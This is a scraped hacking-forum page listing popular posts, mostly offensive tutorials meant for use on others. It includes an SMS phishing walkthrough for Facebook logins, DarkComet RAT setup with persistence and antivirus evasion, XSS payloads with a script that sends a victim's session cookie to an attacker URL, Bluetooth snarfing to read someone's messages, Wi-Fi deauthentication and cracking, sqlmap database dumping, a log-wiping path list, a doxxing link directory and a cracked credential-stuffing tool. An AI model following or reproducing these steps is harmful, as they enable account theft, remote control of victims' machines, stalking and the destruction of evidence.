Jump to content
Under Attack Mode

we are under attack,
For 2 days we have been the target of DDOS attack by small ScriptKiddies.
We are deploying a solution to solve the problem
Please stay tunned !

If you encounter problems with the new theme please inform the staff

@AdminSec   @mister     @SC_z     @Naylor

Search In
  • More options...
Find results that contain...
Find results in...

Microsoft Releases Patch for Wormable Bug That Threatens Corporate LANs

Microsoft Releases Patch for Wormable Bug That Threatens Corporate LANs

Beware of 'Coronavirus Maps' – It's a malware infecting PCs to steal passwords

Beware of 'Coronavirus Maps' – It's a malware infecting PCs to steal passwords

Try challenges

Register & Join The Game

Break It


Proposal Name : Document Version
Document Release Date :
: CEH v10: EC-Council Certified Ethical
Hacker Complete Training Guide with
Practice Labs
Reference : Certified Ethical Hacking Workbook
View file...

Welcome to Exploit Zone

Become a ninja in the shadow !

  • Welcome To Exploit Zone
  • The kingdom of knowledge sharing in hacking
  • New Updates ! Stay Tunned !
  • Share your knowledge here !
  • unlash your power on our challenges !
  • Become a ninja in the Shadow !


Popular Content

Showing content with the highest reputation since 02/29/20 in all areas

  1. 3 points
    PEASS - Privilege Escalation Awesome Scripts SUITE Here you will find privilege escalation tools for Windows and Linux/Unix* (in some near future also for Mac). These tools search for possible local privilege escalation paths that you could exploit and print them to you with nice colors so you can recognize the misconfigurations easily. Check the Local Windows Privilege Escalation checklist from book.hacktricks.xyz WinPEAS - Windows local Privilege Escalation Awesome Script (C#.exe and .bat) Check the Local Linux Privilege Escalation checklist from book.hacktricks.xyz LinPEAS - Linux local Privilege Escalation Awesome Script (.sh) You can Download it here: [Hidden Content] So you can upload The script on a server and run only the .sh (or .exe/bat) script and it wee enumerate all the vulnerability with a color code:
  2. 3 points
    DOWNLOAD LINK : [Hidden Content] Hello today, I'm going to introduce BlackBullet and its new mode of operation! This software was not created by the community this is a crack so potentially bindd with a virus! Use this software via a virtual machine! What's blackbullet ? At the first opening, you have: We can see The BB File and a "Converter" !! Explanations: BB in version 2.0.2 works with Configs in ==> .ini (original) BB in version 2.1.6 works in config ==> .bbc (encrypted) You understand it, this Converter serves you: * Either to change a config .ini in .bbc, or from .bbc to .ini Go on, we continue ==> Open the folder ==> BlackBullet 2.1.6 Cracked In this Dossier, we find: A folder ==> Combos A folder ==> Configs A folder ==> Proxies So you can accommodate your own Combos and Proxies !! We have everything at hand ... VERY IMPORTANT !!! Check that you have the file ==> Launcher.exe !! If not look in your Anti Virus, it is possible that he quarantined it ... (Nothing to fear though, it's a fake!) B / Launch of BB Now we will launch BB, to use ==> Launcher.exe You have several windows that start !!! The !! You click on ==> Login And that's BB in its Version 2.1.6 !! Come on, let's see the top tabs already: I will detail: * Configs Your chosen config is there !! WordLists ==> Combos As on the picture, We will search for it (Add), we name it, The Type, Purpose = Mix and ==> Accept !! Result: * Proxies If your Proxies are loaded at the end of the Manipulation, that must give it !! At this level, you can check them if you wish !! I pass directly ... Last Tab ==> BruteForcer !! First load Config ==> Select CFG Then the Combo ==> Select List At this moment you must have this !! Check a Last Time: Config The Combo Number of Bots - Normally they are determined in Auto if the Config is well done, otherwise Regulate yourself Bots !! * Your Proxies will appear as soon as you click ==> on Start !! If everything went well !! You should have a BB that looks like this in a running state ... Last Explanation on the Infos which are All right !!! COMBOS: Total = The Number of Accounts that is Tested Hits = Your HITS !!!!! Free = The Accounts that are here, are usually Accounts that ask for to change the Pass, When Connecting. Bad = Bad Retries = As under Sentry, The Relaunch of the Software (Sort of Rééssaie !!) PROXIES: Total: The number of your proxies Alive: Those who are on the move Banned: Those who are banned Bad: Those who are Bad CPM: Combo Per Minute !! this often expresses the "Health" of your Config They are more or less high !! If it stays Zero ==> Config Tired or Dead !! Here is this tutorial ends, I hope to have helped you to like Black Bullet !!
  3. 3 points
    This tuto is the continuation of this one What is XSS by IchInose We'll see how to enhance your XSS payloads, but what it is used for ? -bypass filters -make your payloads less visible to the average users and more.. How to do it There is many ways to enhance your payloads, the most common one is to obfuscate your code : so this code can be blocked by filters. that mean that if a the website verify the user's input and see character like '<' or '"' he can block the message. <script src="[Hidden Content]; so in order to make this payload less understandable we canuse the html entities obfuscation, so the previous code will become : (using [Hidden Content]) &#x3C;script src=&#x22;[Hidden Content]; OR EVEN &#x3C;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x20;&#x73;&#x72;&#x63;&#x3D;&#x22;&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x77;&#x65;&#x62;&#x73;&#x69;&#x74;&#x65;&#x2E;&#x65;&#x75;&#x2F;&#x70;&#x61;&#x79;&#x6C;&#x6F;&#x61;&#x64;&#x73;&#x2E;&#x6A;&#x73;&#x22;&#x3E;&#x3C;&#x2F;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3E; both are understood by the browser even if they don't have character like '<' or '"'. so for a basic script like : <script>alert("haxor");</script> the filter can detect the quotes so you can write it like that : <script>alert(String.fromCharCode(104,97,120,111,114,10));</script> So there is a pretty great way to obfuscate a payload is to use JSFuck: [Hidden Content] with this method combined with a payload like that the payloads (non-obfuscate): ' onmouseover='alert(1)' # the form <input name="text" value=''> # With the payload non-obfuscate: <input name="text" value='' onmouseover='alert(1)'> # with the obfuscated js : <input name="text" value='' onmouseover='[][(![]+[])[+[]]+([![]]+[][[]])[+([]...'> #I cut bc the js was too long as you can see i used a JS event handler it's another way to bypass a filter of '<' or even of '&' or '#'. So there is so many ways to bypass filter you can find some here : [Hidden Content] [Hidden Content] So I hope you find this tuto useful and don't forget to leave a Like 😁
  4. 2 points
    What's SecLists ? SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more. The goal is to enable a security tester to pull this repository onto a new testing box and have access to every type of list that may be needed. [Hidden Content]
  5. 2 points
    Hi, I'm gonna show you who to make a phishing attack. (Phone message vector) It's basic so no knowledge in computer programming needed (but better with...) What are we gonna do ? -We are going to send a message at different people with linked to a phishing page -And all that with a computer (even the message) Steps: -First either you have your own phishing page either you go on website with default phishing page like z-shadow and other... -Create an acc / start your DB -Then Send a message like "We saw that someone try to connect to your Facebook account please log you in with this link : Facebook.phishing.fr to disconnect the malicious person" -You can Send the message with this website: [Hidden Content] /!\ Disclaimer : You can't receive the answer + the used number is 37208 Now just wait for the victim to log in Leave a like
  6. 1 point
    Note: In this format, the RAT program will quite easily be detected by anti-virus software. In order to evade such detection you will have to crypto the DarkComet RAT. It must become undetectable in order to use stealthily. Or, the attacker might install such a program and add exceptions to the anti-virus. The newest versions are always the most stable. Let’s say you use DarkComet 3.2. DarkComet 3.2 will be quite old by the writing of this blog. The system functions may have changed. DarkCoderSc has updated it to DarkComet 5.3.2 with the latest functions, it’s like buying a can of Pepsi then finding it has gone-off. Here is the tutorial on how to setup DarkComet 5.3.1 Go to the DarkComet website ([Hidden Content]). I would not get this RAT from anywhere else, lest it be crawling with gremlins. At the top, you will see a list of items. Click Downloads. Next there will be a list of DarkComet-RAT product versions. Click the top one. When you click Download, you will see three boxes. Tick them. Click Download. Open the DarkComet RAR (You need WinRAR) It should look like this: Make a folder on your desktop. Name it anything you want. Drag the items from the WinRAR folder to the Tutorial folder at your Desktop. Now, everything should be there like this: Open DarkComet.exe (Run as Administrator) A TOS should show up. Tick the box saying ‘Do not display again the EULA‘ that is located at the bottom left. Click ‘I accept‘ At the bottom left, it will show up a Help Screen, tick ‘Do not show at startup‘ then click ‘Fine‘ Click DarkComet-RAT at the top left. Click ‘Listen to new port (+Listen)‘ A new window should open, put in your Port then tick ‘Try to forward automaticaly (UPNP)‘ IN this case, I will do port 70 so I put that in, tick ‘Try to forward automatically (UpNP)‘ and click Listen. Move over to ‘Socket / Net‘ located at the very end of the top left border. You should see something like this: 70 may not be your port, your port that you added in ‘Listen to new port‘ will be displayed, not specifically 70. Go to ‘www.canyouseeme.org‘ Put in the port that you are listened on. If all went well, it should look like this: Now, click DarkComet-RAT again and click Server Module, then click Full Editor (Expert) Name your Security Password anything you like, then click the Mutex a few times. We then have the Main Settings done. Make sure you untick FWB (Firewall Bypass) Go to Network Settings. Now, go to [Hidden Content] and register Click Free DNS Put in whatever you want for it. Make sure the email is valid because we will need it to validate. (if you don’t want to give your email, get a temp email at 10minutemail.com) Sign in now. Now, at the Body you will see a list of options, click ‘Add Host’ Copy the settings: Leave IP Address, as that will show as Default your IP address. Click Create Host. Go back to your DarkComet and put in the Ip/DNS and Port (DNS for the NO-IP you made a second ago and Port for the one you listened on!) Then click ‘Add‘ and go to Module Startup. Tick the ‘Start the stub with windows (module startup)’ Then leave everything but ‘Persistance installation ( always come back )‘ Tick that. Now, it should look like this: Now go to ‘Stub Finalization‘ at the end. If you are going to get it crypted then don’t tick UPX (Ultimate Packer Executable) but if you are, I would leave it off and just have it on No compression. Now tick the ‘Save the profile when stub succesfully generated’ and Build the Stub. Now there is one last thing. Go to the Client Settings in DarkComet-RAT and then Click NO-IP Updater Then put in the NO-IP host, Username and Password, then tick ‘Auto update your no-ip dns when your IP change‘ Now, run the stub that you generated in a Sandbox to test, and you should show up! Here now, we have run through the entire thorough setup for DarkComet. Even your kid brother could follow this tutorial. Now what you need to do is some research into how to encrypt the EXE, so it can be installed remotely without an antivirus putting up a fuss. I know Metasploit has some pretty good encryption in it’s framework. I would start there. Watch out for others telling you they will encrypt it for you. This is usually a trick to just pack their own RAT into your stuff!
  7. 1 point
    In this topic you will find all the useful links to carry out your dox If you see another website to place here, juste MP me or add in comment ! 1: Username (Alias) [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] 2: Archives [Hidden Content] [Hidden Content] [Hidden Content] 3: Social Networks [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] 4: Phone Numbers [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] 5: IP Addresses [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] 6: Skype Resolvers [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] 7: Database Search [Hidden Content] 8: WHOIS/Website [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] 9: Images [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] 10: IP2Skype [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content]ip2skype.php [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] 11: Email2Skype [Hidden Content]email.php [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] 12: Skype2Lan [Hidden Content] 13: Skype2Email [Hidden Content] [Hidden Content] 14: MAC Address Lookup [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] 15: Lat/Long [Hidden Content] [Hidden Content] [Hidden Content] 16: EXIF Data [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] 17: IP Logger [Hidden Content] [Hidden Content] 18: Other [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content]uk/ [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] [Hidden Content] 19 : Best [Hidden Content] ?️
  8. 1 point
    at the end of this tuto you will be able to call with someone's phone and read his message phonebook and more.. Requirement - Bluesnarfer ([Hidden Content]) - Bluebugger ([Hidden Content]) - Bluetooth device (see them : hciconfig -a) Setup to avoid error you will need to do this (error with bluesnarfer most of the times) mkdir -p /dev/bluetooth/rfcomm mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0 Scan To scan we'll use hcitool and hciconfig or btscanner (but btscanner don't work w/ me so i can't guaranty anything w/ it) hciconfig -a #to see devices hcitool scan to make sure the target is reachable l2ping <target_MAC> To get the target's channel we'll use sdptool sdptool browse --tree --l2cap <target_MAC> You'll find the channel under the form: the number is in hex so you have to get it in decimal. Gather now it's time to connect to the target with bluesnarfer Bluesnarfer -r 1-100 -C <channel_in_decimal> -b <target_MAC> now you can use bluebugger to read message make a call with his phone or other actions bluebugger -c <channel_in_decimal> -a <target_MAC> <Mode> Mode: ----- info = Read Phone Info (default) phonebook = Read Phonebook (default) messages = Read SMS Messages (default) dial <num> = Dial number ATCMD = Custom Command (e.g. '+GMI') Note: Modes can be combined, e.g. 'info phonebook +GMI' Leave a like 😁
  9. 1 point
    Thanks for the share, I tested it on windows 10. It look very usefull for enumerate the rights of the user actual, but for moment 2 CVE didn't worked for me ^^ and smartscreen block the installation 😕 But still usefull.
  10. 1 point
    Ichinose approved the submission
  11. 1 point
    Introduction SNMP - Simple Network Management Protocol The goal is to enumerate the user and peripheral accounts in a system using SNMP SNMP consists of two elements: 1. The manager 2. The agent SNMP contains two elements that interest us: 1. Read Community String 2. Read / Write Community String Operating : On each machine have installed an agent that stoic information in a nome MIB database The managers are responsible for questioning the agents and Manages the hatches Browser MIB / Platform Administration tools Requests / Responses / Alerts Management Information Base (MIB) [Hidden Content] Exploitation [Hidden Content] Enumeration [Hidden Content]
  12. 1 point
    The enumeration will allow an attacker to: • Identify valid user accounts • Shared resources • Networks Applications Methodology 1. Find the Ips address range 2. Calculate the network mask 3. Discovery of active hosts 4. Port Scanning 5. NetBIOS enumeration 6. SNMP enumeration 7. LDAP listing 8. SMTP enumeration 9. DNS enumeration 10. Reporting Port to List : [Hidden Content] More informations will be update later
  13. 1 point
    What is XSS ? XSS stand for Cross site scripting, so basically it consists on injecting HTML code into a website. This vulnerability can be really critical, for example you can steal users sessions cookie, redirect the website page to a malicious one or even worst... Persistent XSS (stored XSS) The persistent XSS is a script that is stored on the server and will be executed each time a user is going on the page infected. How to infect (stored) Most of the time it's through posts or comment on a website, anywhere on the website if there is an input that is shown on the website page. Here are examples of scripts that you can use: #This script send in get method user's session cookie <script>document.write("<img href='YOURURL/?cookie='"+ document.cookie + "'></img>")</script> #This script redirect the webpage to a malicious website #For mouse click <script>indow.location.href = "YOURURL";</script> #For http redirect <script>window.location.replace("YOURURL");</script> <img src="javascript:windows.location.replace("YOURURL")"></img> Non-Persistant XSS (reflected) Non-persistant XSS is very specialized on phishing (most of the time) that mean that you can send to someone a URL from a trusted website and the URL redirect to a malicious website. How to infect (reflected) You can find this vuln on the URL, when there is query that are show on the page (or not), Sometime when websites have personalized 404 error page, you can try to make is print your script [Hidden Content]("YOURURL")</script> How to prevent it In JavaScript: You can ban tags like <script> or others on the input of the user or where the user input is written down. In PHP: You can use the function htmlspecialchars to format the text that the user enter. Leave a Like 😁
  14. 1 point
    I present you sherlock.py, this tool is similar as userrecon but it has more options. compatible with Linux, Windows and macOS Github : [Hidden Content] sherlock's website: [Hidden Content] Leave a like 😁
  15. 1 point
    Hello i wanna share my script for erase tracks, but instead have marked the entire directory of known logs here, to facilitate your scripts "/var/log/yum.log", "/var/log/wtmp", "/var/log/utmp", "/var/log/secure", "/var/log/mysqld.log", "/var/log/boot.log", "/var/log/lighttpd", "/var/log/httpd/", "/var/log/qmail/", "/var/log/maillog", "/var/log/cron.log", "/var/log/kern.log", "/var/log/auth.log", "/var/log/message", "/var/log/lastlog‬‬", "/var/adm/lastlog‬‬", "/‪usr/adm/lastlog‬‬", "/var/log/lastlog", "$LgF", "/etc/utmp", "/etc/wtmp", "/var/adm", "/var/log", "/var/logs", "/var/run/utmp", "/var/apache/log", "/var/apache/logs", "/usr/local/apache/log", "/usr/local/apache/logs", "/root/.bash_logout", "/root/.bash_history", "/root/.ksh_history", "/tmp/logs", "/opt/lampp/logs/access_log", "/var/log/nginx/access.log", "/logs/agent_lo", "/logs/referer_log", "/logs/access_log", "/var/log/apache2", "/var/log/wtmp", If you know other, Tell me
  16. 1 point
    Hi i'll show you how to crack Wifi by brute-forcing their passwords using Aircrack-ng (Doc) Stage 1: check your network interface with ifconfig or ip a Me for example my network interface is wlp0s20f3 And now you can put your interface in monitor mod by running : sudo airmon-ng start <interface> You can also use : ifconfig <interface> down && iwconfig <interface> mode monitor To be more efficient you can (highly recommended) to use: sudo airmon-ng check kill You will be losing you internet connection and it's normal to take it back after you will have to enter: sudo service network-manager start Stage 2: To launch a network listener we will be using airodump-ng: airodump-ng <interface> during this you can stop it with Ctrl+C and note somewhere the essid, bssid, and channel of the targeted wifi then we will analyse the target wifi with this command: airodump-ng -c <channel> --bssid <bssid> <interface> With this scan you'll have to find the mac address of one user connected to the wifi (a station): Stage 3: you will be using two command at the same time: aireplay-ng --deauth <number_of_fdeauth_packet(usually_100)> -a <bssid> -c <station_mac> <interface> this command will send de-authentication packet to the target station to disconnect him (very temporary) airodump-ng --write <name_of_output_file> --channel <channel> --bssid <bssid> <inetrface> this command will store Acks in function of the power of the network you have to get more/less. Stage final: it's the stage of the brute-forcing with this command you will brut force the wifi and it will stop when the password is found: aircrack-ng -a2 -b <bssid> -w <wordlist> <cap_file> #-a2 for wpa2 Hope you will get a lot of wifi ! Leave a Like 😁
  17. 1 point
    Black bullet release an open-sourced version: I share you the file : [Hidden Content] the github: [Hidden Content] And a little pack of config (Gift) : [Hidden Content] Leave a Like
  18. 1 point
    What is a Zone transfer DNS ? A Zone transfer DNS (also called DNS Interrogation) is used in all DNS server hierarchy. The purpose is to retrieve the IP adresse linked to a name, as you may know the DNS server hierarchy is like that : So the zone transfer will permit to a domain to ask at his authoritative name server his zone DNS like that the domain can actualise his own zone by a relation of master/slave: (axfr mean zone transfer type) This vulnerability is due to a weakness of configuration that allow any host to ask for zone transfer. How To enumerate ? For the exemple i'm gonna use zonetransfer.me ([Hidden Content]) so first what we need is a master and a slave. So we have the zone transfer, let's ask him. by using : dig ns zonetransfer.me i'm asking to zonetransfer.me his master, because i asked for an "ns" (= name server) with the output i get the names servers that handle the website, perfect ! so know we can ask to the master by the slave while using an axfr request type and no longer a ns, because we want a transfer zone. here we find all the website associated to the zonetransfer.me we can use "nslookup"or "host" also to do the same ! doc for dig ==> [Hidden Content] doc for host ==> [Hidden Content] doc for nslookup ==> [Hidden Content] Leave a like
  19. 1 point
    The method of SQL injection with sqlmap is the most used because sqlmap (or Havij) are easy to use simply (and the manually way is really long) This tutorial is not for High level of SQL injection it's mostly to understand . What is a SQL injection ? SQL is the language used to manage and create the database of the website so a sql injection is a injection of code in order to enter into the database and take the information a the admin account (or just take the email of users) in this topic I'm gonna enter into details so if you want to learn more : [Hidden Content] How to find vulnerable site ? So the vulnerability can be find in the id argument of the url under this form : .php?id= you can use Dorks or just write .php?id= in the google search engine and scroll a lot's to automate this task you can use SQLI hunter (with dorks) : [Hidden Content] if when you add ' at the end of the url there is an error where it's writing:(or something similar) SQL/DB Error -- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' order by image_order limit 1' at line 1] SQL/DB Error -- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1] How to exploit the vulnerability ? Me i will use Pentest-box (with sqlmap include) : [Hidden Content] so once you find the web-site (or training web-site), launch a terminal and enter : sudo sqlmap -u url.fr/index.php?id=3654 --batch it will test the connection of the target and test some sql injection Then write : sudo sqlmap -u url.fr/index.php?id=3654 --dbs to show the database present to select one DB and show the tables: sudo sqlmap -u url.fr/index.php?id=3654 -D NAME_of_DB --tables and to select one tables and show the columns write : sudo sqlmap -u url.fr/index.php?id=3654 -D NAME_of_DB -T NAME_of_TABLES --columns so the next stage is to show what's into the columns (user or mail etc...) to do that we are gonna dump the DB, and to do that write: sudo sqlmap -u url.fr/index.php?id=3654 -D NAME_of_DB -T NAME_of_TABLES -C NAME_of_COLUMNS_1,NAME_of_COLUMNS_2 --dump as you can see you can select many objects by separating then with a coma. so know you have either the tables in clear either in hashes and in this case you have to decrypt the data (and that's not the subject of the topic ) and with SQLI hunter and Havij you can find the admin panel automatically , manually try a lot's a url (but the SQLI hunter and Havij way is more optimize) then connect you and do whatever you want to do. Leave a like HERE are some vulnerable website : [Hidden Content] [Hidden Content]


  • Create New...